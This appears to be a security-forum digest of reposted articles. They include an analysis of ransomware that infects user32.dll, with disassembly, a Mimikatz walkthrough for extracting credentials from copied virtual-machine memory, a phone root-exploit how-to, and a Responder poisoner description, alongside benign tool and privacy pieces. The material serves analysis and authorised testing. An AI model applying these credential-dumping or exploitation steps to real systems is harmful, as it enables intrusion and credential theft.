[h=2]Ransomware infecting user32.dll[/h] Over the past months we’ve been monitoring a new variant of the Department of Justice (DOJ) ransomware. Till date there is nothing written about this new variant on the internet. This blog item aims to address this. Analysis of this particular ransomware shows that the method to infect victims is different compared to previous ransomware samples. Instead of dropping an executable on the system it infects the Windows system DLL: user32.dll. This file is typically located in: C:\Windows\System32\user32.dll or C:\Windows\SysWOW64\user32.dll So far we’ve observed that the ransomware is only infecting the 32-bit version of user32.dll. Static detection Our support desk helped a victim in January 2014. Four months later, detection is still poor: Resource section The ransomware enlarges the resource section of user32.dll as can be seen in the table below: [TABLE] [TR] [TH=colspan: 4]Original user32.dll[/TH] [TH=colspan: 4]Infected user32.dll[/TH] [/TR] [TR] [TH]name[/TH] [TH]va[/TH] [TH]vsize[/TH] [TH]rawsize[/TH] [TH]name[/TH] [TH]va[/TH] [TH]vsize[/TH] [TH]rawsize[/TH] [/TR] [TR] [TD].text[/TD] [TD]0×1000[/TD] [TD]0x5f283[/TD] [TD]0x5f400[/TD] [TD].text[/TD] [TD]0×1000[/TD] [TD]0x5f283[/TD] [TD]0x5f400[/TD] [/TR] [TR] [TD].data[/TD] [TD]0×61000[/TD] [TD]0×1180[/TD] [TD]0xc00[/TD] [TD].data[/TD] [TD]0×61000[/TD] [TD]0×1180[/TD] [TD]0xc00[/TD] [/TR] [TR] [TD].rsrc[/TD] [TD]0×63000[/TD] [TD]0x2a088[/TD] [TD]0x2a200[/TD] [TD].rsrc[/TD] [TD]0×63000[/TD] [TD]0x33a88[/TD] [TD]0x33c00 [/TD] [/TR] [TR] [TD].reloc[/TD] [TD]0x8e000[/TD] [TD]0x2de4[/TD] [TD]0x2e00[/TD] [TD].reloc[/TD] [TD]0x8e000[/TD] [TD]0x2de4[/TD] [TD]0x2e00[/TD] [/TR] [/TABLE] Analysis of the increased resource section in this file shows that it contains an encrypted payload with a decryptor embedded. We will show how the malware gets active once it has successfully infected the user32.dll file. EntryPoint patched The code in the entrypoint of an infected user32.dll is patched with a jump to AlignRects, as can be seen below: Original: UserClientDllInitialize: 7e41b217 8B FF mov edi, edi 7e41b219 55 push ebp 7e41b21a 8B EC mov ebp, esp 7e41b21c 83 7D 0C 01 cmp [ebp+0xC], 1 7e41b220 75 05 jnz 0x7e41b227 7e41b222 E8 5D 07 00 00 call 0x7e41b984 7e41b227 5D pop ebp 7e41b228 90 nop 7e41b229 90 nop 7e41b22a 90 nop 7e41b22b 90 nop 7e41b22c 90 nop 7e41b22d 8B FF mov edi, edi 7e41b22f 55 push ebp 7e41b230 8B EC mov ebp, esp Patched: UserClientDllInitialize: 7e41b217 8B FF mov edi, edi 7e41b219 55 push ebp 7e41b21a 8B EC mov ebp, esp 7e41b21c 83 7D 0C 01 cmp [ebp+0xC], 1 7e41b220 75 0E jnz 0x7e41b230 7e41b222 E8 00 00 00 00 call 0x7e41b227 7e41b227 83 04 24 0A add [esp], 0xa 7e41b22b E9 B0 22 05 00 jmp AlignRects ________________________________________ 7e41b230 8B EC mov ebp, esp The code at AlignRects is not the original, but is replaced with code that allocates a new block of executable memory. Hereafter it copies the encrypted payload from the resource section to this newly allocated memory. AlignRects: 7e46d4e0 leave 7e46d4e1 pusha 7e46d4e2 push ebp 7e46d4e3 mov ebp, esp 7e46d4e5 sub esp, 8 7e46d4e8 mov eax, [ebp+0x4C] ; EAX becomes base-address of ; user32.dll (7E410000) 7e46d4eb mov ecx, eax 7e46d4ed add eax, 0x13bc 7e46d4f2 mov eax, [eax] ; EAX becomes address of ; NtQueryVirtualMemory 7e46d4f4 add eax, 0xfffff5f0 ; EAX becomes address of ; NtAllocateVirtualMemory 7e46d4f9 push 0x40 7e46d4fb push 0x3000 7e46d500 lea ecx, [ebp-0x4] 7e46d503 mov [ecx], 0xc576 7e46d509 push ecx 7e46d50a push 0 7e46d50c lea ecx, [ebp-0x8] 7e46d50f mov [ecx], 0 7e46d515 push ecx 7e46d516 push 0xff 7e46d518 call eax ; Call NtAllocateVirtualMemory 7e46d51a mov edi, [ebp-0x8] ; EDI = allocated address 7e46d51d mov eax, edi 7e46d51f mov esi, [ebp+0x4C] ; ESI = base-address of ; user32.dll (7E410000) 7e46d522 add esi, 0x8d200 ; ESI = address of encrypted payload ; in resource section 7e46d528 mov ecx, 0x98bb 7e46d52d rep movs es:[edi], ds:[esi] ; Copy to allocated ; (executable) range 7e46d52f leave 7e46d530 add eax, 0x981e ; EAX = address of decryption code 7e46d535 jmp eax ; Start decryption !! As can be seen from this code an executable block of memory is allocated. In order to do that, the address of NtAllocateVirtualMemory is calculated using the address of NtQueryVirtualMemory, which was obtained from the IAT of user32.dll. The encrypted payload is copied into the newly allocated range of memory. This encrypted payload contains a small piece of decryption code, located near the end of the encrypted payload. This decryption code is shown below: 0:000> r eax=0029981e ebx=7e41b217 ecx=00000000 edx=7c90e514 esi=7e4a6abb edi=002998bb eip=0029981e esp=0007f9d4 ebp=0007fa10 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 0:000> u eax l20 0029981e call 00299823 00299823 pop edx EDX = current location ! 00299824 sub edx,7FFA2F22h 0029982a push esi 0029982b lea esi,[edx+7FFA2F1Dh] ESI = allocated mem-base (290000) 00299831 mov ecx,981Eh ECX = size to decrypt (num bytes) 00299836 sub esi,ecx 00299838 push esi 00299839 mov ebx,6FAAEh The XOR key (BL only, so AEh) 0029983e xor byte ptr [esi],bl Decrypt byte-by-byte 00299840 inc esi 00299841 inc ebx Modify XOR key for each byte (+1) 00299842 loop 0029983e 00299844 pop eax 00299845 pop ecx 00299846 mov dword ptr [eax+12h],ecx 00299849 jmp eax Jump to allocated mem-base, which is now decrypted. The decryption of the payload uses a XOR based decryption scheme were the XOR value for each byte to decrypt is incremented after each operation. Once all bytes in the allocated memory range are decrypted, the now plain code is executed. Note the first two instructions of this decryption code, where a call/pop combination is used to obtain the current address. This makes the decryption code position independent. The only ‘fixed’ values in this code are the size of the encrypted payload and the XOR key, so automating the payload and decryptor to avoid static detection can be easily accomplished. Once the ransomware becomes active, some typical ransomware behavior is performed: Windows Safe Mode is disabled Task Manager is blocked Command Prompt is blocked Registry Editor is blocked … and of course the police themed picture is shown where a ransom fee is demanded in order to release the PC (see picture at the top of this article). Victims can use the very easy-to-use HitmanPro.Kickstart to get rid of police themed ransomware infection. Blocking CD-ROM drives A new property of this particular ransomware is that it disables CD-ROM drives. This makes it for some computers harder to clean the system as is explained below. When HitmanPro detects a system file that is infected, it searches for a white-listed variant on the computer. This as Windows tends to keep a copy of system files on multiple locations on the hard disk. If HitmanPro cannot find a white-listed known safe version, it prompts for the Windows installation CD/DVD media that came with the computer. This is a very useful feature of HitmanPro and it has been in HitmanPro for years to return infected system files to pristine state! But since this new ransomware infection blocks access to the CD/DVD the user can no longer provide the Windows installation media for original files. New Cloud Service Today we release a BETA build of HitmanPro that queries a new HitmanPro-cloud service that can provide a clean system file so that the user no longer has to provide Windows installation media. 32-bit: http://dl.surfright.nl/HitmanProBeta.exe 64-bit: http://dl.surfright.nl/HitmanProBeta_x64.exe Samples: 3AF4FA2BFFAAB37FD557AE8146AE0A29BA0FAF6D99AD8A1A8D5BF598AC9A23D1 3A061EE07D87A6BB13E613E000E9F685CBFFB96BD7024A9E7B4CB0BE9A4AF38C 7DD93123078B383EC179C4C381F9119F4EAC4EFB287FE8F538A82E7336DFA4CA Sursa: Ransomware infecting user32.dll |

How to Get Started in CTF by Steve Vittitoe Over the past two weeks, I’ve examined two different problems from the DEFCON 22 CTF Qualifications: “shitsco” and “nonameyet”. Thank you for all of the comments and questions. The most popular question I received was “How can I get started in CTFs?” It wasn’t so long ago that I was asking myself the same thing, so I wanted to provide some suggestions and resources for those of you interested in pursuing CTFs. The easiest way to start is to sign up for an introductory CTF like CSAW, Pico CTF, Microcorruption, or any of the other dozens available. Through practice, patience, and dedication, your skills will improve with time. If you’re motivated to take a crack at some of the problems outside of the competition setting, most CTF competitions archive problems somewhere. Challenges tend to have a wide range of difficulty levels as well. Be careful about just picking the easiest problems. Difficulty is subjective based on your individual skillset. If your forte is forensics but you are not skilled in crypto, the point values assigned to the forensics problems will seem inflated while the crypto challenges will seem undervalued to you. The same perception biases hold true for CTF organizers. This is one reason why assessing the difficulty of CTF problems is so challenging. If you’ve tried several of the basic problems on your own and are still struggling, then there are plenty of self-study opportunities. CTF competitions generally focus on the following skills: reverse engineering, cryptography, ACM style programming, web vulnerabilities, binary exercises, networking, and forensics. Pick one and focus on a single topic as you get started. 1) Reverse Engineering. I highly suggest that you get a copy of IDA Pro. There is a free version available as well as a discounted student license. Try some crack me exercises. Write your own C code and then reverse the compiled versions. Repeat this process while changing compiler options and program logic. How does an “if” statement differ from a “select” in your compiled binary? I suggest you focus on a single architecture initially: x86, x86_64, or ARM. Read the processor manual for whichever one you choose. Book recommendations include: Practical Reverse Engineering Reversing: Secrets of Reverse Engineering The IDA Pro Book 2) Cryptography. While this is not my personal strength, here are some resources to check out: Applied Cryptography Practical Cryptography Cryptography I 3) ACM style programming. Pick a high level language. I recommend Python or Ruby. For Python, read Dive into Python (free) and find a pet project you want to participate in. It is worth noting that Metasploit is written in Ruby. Computer science classes dealing with algorithms and data structures will go a long way in this category as well. Look at past programming challenges from CTF and other competitions – do them! Focus on creating a working solution rather than the fastest or most elegant solution, especially if you are just getting started. 4) Web vulnerabilities. There are many web programming technologies out there. The most popular in CTF tend to be PHP and SQL. The php.net site is a fantastic language reference. Just search any function you are curious about. After PHP, the next most common way to see web challenges presented is with Python or Ruby scripts. Notice the overlap of skills? There is a good book on web vulnerabilities, The Web Application Hacker’s Handbook. Other than that, after learning some of the basic techniques, you might also think about gaining expertise in a few of the more popular free tools available. These are occasionally useful in CTF competitions too. This category also frequently overlaps with cryptography in my experience. 5) Binary exercises. This is my personal favorite. I recommend you go through reverse engineering before jumping into the binary exercises. There are a few common vulnerability types you can learn in isolation: stack overflows, heap overflows, and format string bugs for starters. A lot of this is training your mind to recognize vulnerable patterns. Looking at past vulnerabilities is a great way to pick up these patterns. You should also read through: Hacking: The Art of Exploitation The Shellcoders Handbook The Art of Software Security Assessment 6) Forensics/networking. A lot of CTF teams tend to have “the” forensics guy. I am not that guy, but I suggest you learn how to use the 010 hex editor and don’t be afraid to make absurd, wild, random guesses as to what could be going on in some of these problems. Finally, Dan Guido and company recently put out the CTF field guide, which is a great introduction to several of these topics. Sursa: How to Get Started in CTF | Endgame.

HTTPie: a CLI, cURL-like tool for humans HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized responses. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers. HTTPie is written in Python, and under the hood it uses the excellent Requests and Pygments libraries. Table of Contents Main Features Installation Usage HTTP Method Request URL Request Items JSON Forms HTTP Headers Authentication Proxies HTTPS Output Options Redirected Input Terminal Output Redirected Output Download Mode Streamed Responses Sessions Config Scripting Interface Design Contribute Logo Authors Licence Changelog Main Features Expressive and intuitive syntax Formatted and colorized terminal output Built-in JSON support Forms and file uploads HTTPS, proxies, and authentication Arbitrary request data Custom headers Persistent sessions Wget-like downloads Python 2.6, 2.7 and 3.x support Linux, Mac OS X and Windows support Documentation Test coverage Sursa: https://github.com/jakubroztocil/httpie

[h=1]termcoin[/h] A bitcoin wallet and blockchain explorer for your terminal. termcoin bitcoin wallet and blockchain explorer for your terminal, written for node.js termcoin's UI is rendered by blessed which is a full ncurses replacement and high-level widget library. Expect mouse support, eye-candy hover effects, and so-on. termcoin's bitcoin implementation is now based on BCoin which fully implements BIP-37's description of bloom filters. This basically means you don't have to download the entire blockchain to use your wallet. You ask for and store only the transactions relevant to you (broadcasted in your bloom filter), while at the same time being able to verify the merkleroot of blocks. The blockchain explorer currently uses the blockchain.info json api as a backend. In the future, termcoin will leave an option for the user to download the entire blockchain in the background (using bcoin - out of sheer obsession, I implemented the original satoshi protocol in bcoin), which means you will be able to explore the blockchain on your local disk instead of waiting for api calls to return. For data management, termcoin uses tiny as the database necessary to store the (small) blockchain data and transactions relevant to your account. BCoin was conceived brilliantly, and Fedor Indunty also went to the trouble of writing an ecdsa and bignumber library in pure javascript to supplement BCoin. With all this being said, it's worth pointing out that termcoin is written entirely in pure javascript. All of this means: No compiling a database binding No compiling a binding to an ecdsa library No linking to ncurses No running a bitcoin rpc server in the background No downloading a 20gb blockchain Just use your wallet and enjoy! Termcoin uses a basic JSON wallet format with private keys that are compatible with bitcoind's importprivkey/dumpprivkey (128-prefixed+checksumed+base58) keys. (It also supports AES-CBC encryption for your private keys, just like the official bitcoin client). NOTE: Termcoin used to use bitcoind/litecoind/etc as a backend. This backend is still supported for other currencies. It's just not as featureful due to limitations in the [coin]d rpc server. [h=2]Screenshots[/h] Sursa: https://github.com/chjj/termcoin

Tor Is For Everyone: Why You Should Use Tor EFF recently kicked off our second Tor Challenge, an initiative to strengthen the Tor network for online anonymity and improve one of the best free privacy tools in existence. The campaign—which we've launched with partners at the Freedom of the Press Foundation, the Tor Project, and the Free Software Foundation—is already off to a great start. In just the first few days, we've seen over 600 new or expanded Tor nodes—more than during the entire first Tor Challenge. This is great news, but how does it affect you? To understand that, we have to dig into what Tor actually is, and what people can do to support it. Support can come in many forms, too. Even just using Tor is one of the best and easiest things a person can do to preserve privacy and anonymity on the Internet. What is Tor? Tor is a network and a software package that helps you anonymously use the Internet. Specifically Tor hides the source and destination of your Internet traffic, this prevents anyone from knowing both who you are and what you are looking at (though they may know one or the other). Tor also hides the destination of your traffic, which can circumvent some forms of censorship. Tor has been in development for many years and is very stable and mature. It is regarded as one of the best privacy tools currently in existence and it does not cost you anything. How does Tor help me? This graphic shows how Tor and https can work together to protect your privacy on the Internet. Basically, Tor encrypts that data you send across the Internet in multiple layers, like an onion. Then it sends that data through multiple relays, each one of which peels a layer off the onion until your packet leaves the final relay and gets to its destination. This is called 'onion routing' and it is a fantastic method for keeping privacy on the web. Proper use of tor—along with HTTPS Everywhere—can be one of the best ways to ensure your browsing will remain anonymous. But I don't need privacy, I have nothing to hide! Everyone needs privacy sometimes! For example: perhaps you end up with an embarrassing medical condition and you want to search for information about it but you don't want Google and every advertiser to know about your bodily functions. Tor can help you keep that information private. Tor can also help prevent online tracking more generally as well. Proper use of Tor can circumvent most third party trackers that governments and corporations can use to track your browsing habits and send you obnoxious intrusive advertisements. Tor can also protect your data from hackers on your network. Tor can also help you get around censorship and firewalls from the filter at your school or office or even help you circumvent firewalls or censorship put in place by your government. How do I use Tor? The easiest way to get up and running with Tor is to use the Tor Browser Bundle. It is a version of Firefox that comes preconfigured to use Tor. Tor Browser Bundle is set up to use Tor the right way so that you will avoid a lot of the common pitfalls that can pierce your veil of anonymity. If your prefer a more holistic approach or wish to use Tor for something other than just web browsing, you can use Tails. Tails is an operating system that runs off of a live CD. It is configured so that all Internet connections run through Tor; and when you are done, everything that you did is wiped clean from your computer's memory. It never touches your hard drive and leaves no traces on your computer. If you want to use Tor on your android phone, check out Orbot, it can run your browsing and other programs through Tor. Tor sounds great. What can I do to help? To help make Tor faster and more secure one of the best things you can do is set up a Tor relay. That's what we're asking people to do in our Tor Challenge. The more relays there are in the Tor network the more speed and security Tor has. Setting up a relay may also improve your own personal anonymity. But even just using Tor increases the anonymity of all the other users. There's some safety in numbers: if the only people using Tor are those who have a serious need for it then any use of Tor is suspicious. But if Tor gets used for everything from pizza orders to looking at funny cat photos then it is much less so. So if I use Tor will I have perfect anonymity all of the time? Nothing is foolproof, not even Tor. If you use Tor the wrong way you can end up destroying your own anonymity. If you use Tor to log into Facebook or Gmail, for example, they may not know where you are coming from but they will certainly know who you are and they may even be able to track your browsing around the web. The Tor Project has posted a list of common mistakes that inexperienced users sometimes make. When used properly Tor is one of the best tools for internet privacy that exists. You can use it to circumvent firewalls in an oppressive country, retain your privacy, or browse the Internet while at school. Setting up and running Tor is easy and it is one of the best things any citizen of the Internet can do to help keep a free and open Internet. And if you can run a Tor relay, or want to commit to boosting the bandwidth on a relay you already run, you can take part in our Tor Challenge and push us over our target while collecting prizes. Check out the Tor Challenge today. Sursa: https://www.eff.org/deeplinks/2014/06/why-you-should-use-tor

Blackberry Forensics 1.0. UNLOCKED BLACKBERRY DEVICES Unlocked BlackBerry device with no password Situation •BB contains memory card and SIM. •Which type of data extraction should be performed and in what order? •Physical, File System, then Logical? Examiner Considerations: •There are a variety of tools available to the examiner. •Start Physical, if supported,then move to File System and Logical. •Wear Leveling •A data structure at the logical level, in the form of a logical backup/acquisition is different than the same record at the physical level. •** In rare cases performing a physical with UFED may cause device to reset itself to factory default. •This referred by Cellebrite as “cache memory reset”. Download: https://digital-forensics.sans.org/summit-archives/dfir14/BlackBerry_Forensic_Nuggets_Shafik_Punja_and_Cindy_Murphy.pdf

DNS Sinkhole This paper describes the architecture and configuration of a complete Domain Name Services (DNS) sinkhole system based on open-source software. The DNS sinkhole can be used to provide detection and prevention of malicious and unwanted activity occurring between organization computer systems and the Internet. The system is inexpensive, effective, scalable and easy to maintain. Download: https://www.sans.org/reading-room/whitepapers/dns/dns-sinkhole-33523

Reverse Engineering Malicious Javascript Jose Nazario, Ph.D. <jose@arbor.net> Bad guys want to get malware on your box. They don’t want your security systems to detect their known exploits. So they obfuscate them. By the end of this talk you’ll be armed with techniques to defeat their techniques. Download: https://cansecwest.com/csw07/csw07-nazario.pdf

[h=3]Mimikatz Against Virtual Machine Memory Part 2[/h] Short update to talk about mostly performing the actions from Part 1 on Windows 8+ and Windows Server 2012 First issue was symbols in windbg. Most importantly, NO symbols for windbg. I found this article that lets you remotely download them: Use the Microsoft Symbol Server to obtain debug symbol files .sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols 0: kd> .sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols Symbol search path is: SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols Expanded Symbol search path is: srv*f:\localsymbols*http://msdl.microsoft.com/download/symbols 0: kd> .reload Loading Kernel Symbols ............................................................... ................................................................ .............. Loading User Symbols Loading unloaded module list ......... Second issue was creating the dmp file. I tried volatility's imagecopy and The Windows Memory Toolkit. Neither produced a dump file that would work with windbg for Windows 8 or Windows 2012. What did work was VMWare's vmss2core utility. Note for VMware workstation/fusion you need to pass it the .vmsn and .vmem files (shown above) For VMware ESXi i just needed to pass the .vmsn file The rest follows the same flow as the previous post 1. Load the memory.dmp file vmss2core created 2. Fix your symbols (shown above) 3. Load the mimilib.dll file kd> .load C:\users\user\desktop\mimilib.dll 4. Find the lsass process kd> !process 0 0 lsass.exe PROCESS ffffe00112f08080 SessionId: 0 Cid: 01e8 Peb: 7ff623aac000 ParentCid: 0194 DirBase: 06291000 ObjectTable: ffffc001f8f0c400 HandleCount: Image: lsass.exe 5. Switch to that process kd> .process /r /p ffffe00112f08080 Implicit process is now ffffe001`12f08080 Loading User Symbols ................................................................ 6. Run Mimikatz kd> !mimikatz 7. Drink Beers Posted by CG at 11:45 AM Sursa: Carnal0wnage & Attack Research Blog: Mimikatz Against Virtual Machine Memory Part 2

[h=3]Mimikatz Against Virtual Machine Memory Part 1[/h]Pentesting is a funny thing. Someone will drop some new way of doing something and then you get to reflect on all those missed opportunities on previous engagements. I remember when MC showed me all the Oracle stuff and I reminisced about the missed shells. This post and part 2 is like that for me. I can't count the number of times i've had access to the folder full of an organization's virtual machines. I knew you could download the raw disk (vmdk) and use tools like volatility on them to carve out useful pieces of the file system but not memory. While doing some research on vCenter/ESXi I came across a couple of blog posts on the subject: Extract Windows passwords from VMware .vmem file WinDbg et l’extension de mimikatz | Blog de Gentil Kiwi Password dump from a Hyper-V Virtual Machine´s memory | vNiklas Virtualization blog This of course sent me down the rabbit hole to see if I could do it. Remko's post mentions you need a few things: The Windows debugging tools: Debugging Tools for Windows Direct Download - Remko Weijnen's Blog (Remko's Blog) WinDBG | Blog de Gentil Kiwi The Windows Memory Toolkit MoonSols Windows Memory Toolkit | MoonSols Current mimikatz that supports the windbg magic https://github.com/gentilkiwi/mimikatz Gotcha #1: The free version of Windows Memory Toolkit limits OS and architecture you can do this on. Restrictions are 32bit up to Windows Server 2008. The process: #1 Copy the vmem/vmsn from the remote host #2 Use moonsols bin2dmp to convert it into a dmp file. (I'm using the for pay version below) C:\Users\user\Desktop>Bin2Dmp.exe "Windows Server 2008 x64-b2afd86a.vmem" win2k8.dmp bin2dmp - v2.1.0.20140115 Convert raw memory dump images into Microsoft crash dump files. Copyright (C) 2007 - 2014, Matthieu Suiche Copyright (C) 2012 - 2014, MoonSols Limited Initializing memory descriptors... Done. Directory Table Base is 0x124000 Looking for Kernel Base... Looking for kernel variables... Done. Loading file... Done. nt!KiProcessorBlock.Prcb.Context = 0xFFFFF80001B797A0 stuff happens [0x0000000040000000 of 0x0000000040000000] [0x000000001DAFE000 of 0x000000 MD5 = E8C2F318FA528285281C21B3141E7C51 Total time for the conversion: 0 minutes 14 seconds. you should now have a .dmp file you can load into windbg #3 Load the dmp file into windbg Gotcha #2: You may have to run .symfix and .reload kd> .symfix kd> .reload Loading Kernel Symbols ............................................................... ................................................................ ..... Loading User Symbols Loading unloaded module list .... #4 Load the mimilib.dll file kd> .load C:\users\user\desktop\mimilib.dll .#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (May 25 2014 21:48:13) .## ^ ##. Windows build 6002 ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' WinDBG extension ! * * */ =================================== # * Kernel mode * # =================================== # Search for LSASS process 0: kd> !process 0 0 lsass.exe # Then switch to its context 0: kd> .process /r /p # And finally : 0: kd> !mimikatz =================================== # * User mode * # =================================== 0:000> !mimikatz =================================== The tool output will walk you through the rest #5 Find the lsass process kd> !process 0 0 lsass.exe PROCESS fffffa800dba26d0 SessionId: 0 Cid: 023c Peb: 7fffffd4000 ParentCid: 01e4 DirBase: 2e89f000 ObjectTable: fffff880056562c0 HandleCount: 1092. Image: lsass.exe #6 switch to the lsass context fffffa800dba26d0 in this case kd> .process /r /p fffffa800dba26d0 Implicit process is now fffffa80`0dba26d0 Loading User Symbols ................................................................ ...................... #7 Load mimikatz kd> !mimikatz Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : WIN-3C4WXGGN8QE$ Domain : UNLUCKYCOMPANY SID : S-1-5-20 msv : [00000002] Primary * Username : WIN-3C4WXGGN8QE$ * Domain : UNLUCKYCOMPANY * NTLM : ea2ed0b14406a168791adf5aee78fd0b * SHA1 : ab7bd2f6a64cf857c9d69dd65916622e3dc25424 tspkg : KO ---SNIP--- Authentication Id : 0 ; 173319 (00000000:0002a507) Session : Interactive from 1 User Name : Administrator Domain : UNLUCKYCOMPANY SID : S-1-5-21-2086621178-2413078777-1398328459-500 msv : [00000002] Primary * Username : Administrator * Domain : UNLUCKYCOMPANY * LM : e52cac67419a9a2238f10713b629b565 * NTLM : 64f12cddaa88057e06a81b54e73b949b * SHA1 : cba4e545b7ec918129725154b29f055e4cd5aea8 tspkg : * Username : Administrator * Domain : UNLUCKYCOMPANY * Password : Password1 wdigest : * Username : Administrator * Domain : UNLUCKYCOMPANY * Password : Password1 kerberos : * Username : Administrator * Domain : UNLUCKYCOMPANY.NET * Password : Password1 * Key List ---SNIP--- There were a few other gotchas for Windows 8 and Windows 2012. I'll put that in part 2. CG Posted by CG at 12:37 PM Sursa: Carnal0wnage & Attack Research Blog: Mimikatz Against Virtual Machine Memory Part 1

Z2 Root Exploit Hey guys, this is a cross-post of sorts. I just got root execution on my stock Z2 Tablet and it appears that the same method should work for Z2 phone. I have a Z2 phone but just haven't tested it on that one yet. Here is my Linux script to grab the TA partition from Z2: https://mega.co.nz/#!bVYx2I4S!x-9qkv...VfbiAd0jEDDgWY [update, v4] DooMLoRD's Windows version: http://doomlord.xperia-files.com/dow...Y0X1dJTkRPV1M= Requirements: 1. Be on an early Z2 phone/tablet firmware. .69 is confirmed working, .402 is confirmed patched 2. Use Linux or something that has 'bash' Instructions: 1. Extract exploit.tar.gz and run ./root1.sh 2. Crash the system menu that appears by doing System Info -> Configuration or similar. 3. Run ./root2.sh 4. Repeat Step #2 3. Your TA.img should now be in /data/local/tmp. Use adb pull /data/local/tmp/TA.img to retrieve it. Tell me if it works or if you get any errors. Thanks. Sursa: Z2 Root Exploit - xda-developers

[h=2]Low level PC attack papers[/h]BIOS/Firmware: Attacking Intel BIOS BootKit: eEye BootRoot Bootkit: Deep Boot ... Sursa: A Timeline made with Timeglider, web-based timeline software

[h=1]Responder[/h]Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. [h=1]INTRODUCTION[/h] This tool is first an LLMNR, NBT-NS and MDNS responder, it will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: NetBIOS Suffixes (16th Character of the NetBIOS Name)). By default, the tool will only answers to File Server Service request, which is for SMB. The concept behind this, is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option via command line if you want this tool to answer to the Workstation Service request name suffix. Sursa: https://github.com/Spiderlabs/Responder

Translate regular Assembly into Extended Instructions SSEXY - Convert x86 Instruction into their SSE equivalent. For more information; read the slides and summary which can be found here. http://jbremer.org/ssexy.zip Sursa: https://github.com/jbremer/ssexy

[h=3]Monkeying around with Windows Phone 8.0[/h] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Ah, the wonders of Windows Phone 8.0 ... Failing eyesight, Frustration and Squirrel chasing[/TD] [/TR] [/TABLE] Currently, there is not much freely available documentation on how Windows Phone 8.0 stores data so it is hoped that the information provided in this post can be used as a stepping stone for further research / possible scripting. Hopefully, analysts will also be able to use this post to help validate any future tool results. Special Thanks to Detective Cindy Murphy (@CindyMurph), Lieutenant Jennifer Krueger Favour (@rednogn) and the Madison Police Department ("Forensicate Like A Champion!") for providing the opportunity and encouragement for this research. Unfortunately, due to time contraints and a limited test data set, I wasn't able to write an all-singing/all-dancing script. Instead, some one-off scripts were created to extract/sort the relevant data a lot quicker than it would have taken to do manually. Rather than releasing scripts that are customized for a limited set of test data (which I don't have easy access to any more) - this post will be limited to documenting the data sources/structures. OK, so no free tool and you're still here reading huh? In Yoda voice: "The nerd runs strong in this one" Thanks to Maggie Gaffney from Massachusetts State Patrol / Teel Technologies, the initial test data (.bin file) was sourced via JTAG from a Nokia 520 Windows 8.0 phone - a "cheap" smart phone common to prepaid plans. The .bin file was then opened in X-Ways Forensics to parse the 28(!) file system partitions and to export out files of interest. The exported files were then viewed in hex view using Cellebrite Physical Analyzer (love the data interpretation and colour coded bookmarking!). Later, we were also able to get our paws on some test data from a HTC PM23300 Windows Phone 8.0 phone courtesy of JoAnn Gibb from the Ohio Attorney Generals Office. It's awesome knowing people that know people! Note: The Nokia 520 does not display the full SMS timestamp info (threaded messages display date only). So while we can potentially re-create the order of threaded messages as per the test phone, we can't easily validate the exact time an SMS message was sent/received. There's a good chance that other Windows Phone 8.0 phones will use the same timestamp mechanism and hopefully they will display the full timestamp. [h=3]So where's the data?![/h] The SMS content, MMS file attachment info and Contacts information are stored (via the 28th Partition) in: \Users\WPCOMMSSERVICES\APPDATA\Local\Unistore\store.vol Various .dat files containing MMS content are also stored in sub-directories of: \SharedData\Comms\Unistore\data The Call log is stored in: \Users\WPCOMMSSERVICES\APPDATA\Local\UserData\Phone The "store.vol" and "Phone" files seem to be ESE Databases (see explanantions here and here) with the magic number of "xEF xCD xAB x89" present at bytes 4-8. Consequently, we tried opening "store.vol" using Nirsoft's ESE Database viewer but had limited success - the SMS message texts were not viewable however other data was. This suggests that maybe the "store.vol" file differs in some way from the ESE specification and/or the tool had issues reading the file. Joachim Metz has also both documented (here and here) and written a C library "libesedb" to extract ESE databases. Unfortunately, I didn't discover Joachim's library until after we started poking around .. Anyway, it was a pretty masochistic interesting exercise trying to reverse engineer the "store.vol" file. One possible benefit of this data diving is that it *might* also reveal unallocated/partially overwritten data records that might be ignored by libraries which read the amount of data declared (vs reading all the data present). This is pure speculation though as I don't know if old records are overwritten or just marked as invalid. Viewing "store.vol" using Cellebrite Physical Analyzer, relevant data was observed for text strings (eg phone numbers, SMS text strings) encoded in UTF-16 LE throughout the file. As a database file there will be tables. Each table will have columns of values (eg time, text content, flags). A single (table row) record will thus have data stored for each column. Table data will be organized within the file somehow (eg multiple SMS records organized into page blocks). So it is likely that finding a hit for a specific SMS will lead you to the contents of other SMS messages (potentially around the same timeframe). The Nokia 520 was actually locked with a 4 digit PIN when we started investigating. Without access to the phone, any manual inspection/validation would have been impossible. It was unknown if the phone would have been wiped if too many incorrect PINs were entered. So any guesses would have to be documented and carefully chosen. It wasn't looking good ... until a combination of thinking outside the box and a touch of luck lead us to an SMS text message (in "store.vol") with the required 4 digit code. Open sesame! [h=3]Some things we tried with the data ...[/h] To find specific SMS records we searched for unique/known strings from the SMS text (eg "Look! A Squirrel!"). A single record was found per SMS in "store.vol" and each record also contained a UTF-16-LE string set to "SMStext". To find contact information, we searched for known phone number strings (eg +16085551234, 123456, 1234). Some numbers were observed in "store.vol" in close proximity to "SMStext" strings while other instances were located close to what appeared to be contact information (eg contact names). To search for field markers and flags, we compared separate SMS text records and looked for patterns/commonalities in the hex. Sometimes the pattern was obvious (eg "SMStext" occurs in each SMS message) and sometimes it wasn't so obvious (sometimes there is no discernible pattern!). Figuring out the timestamp format being used was HUGE. Without it, we could not have figured out the order messages were 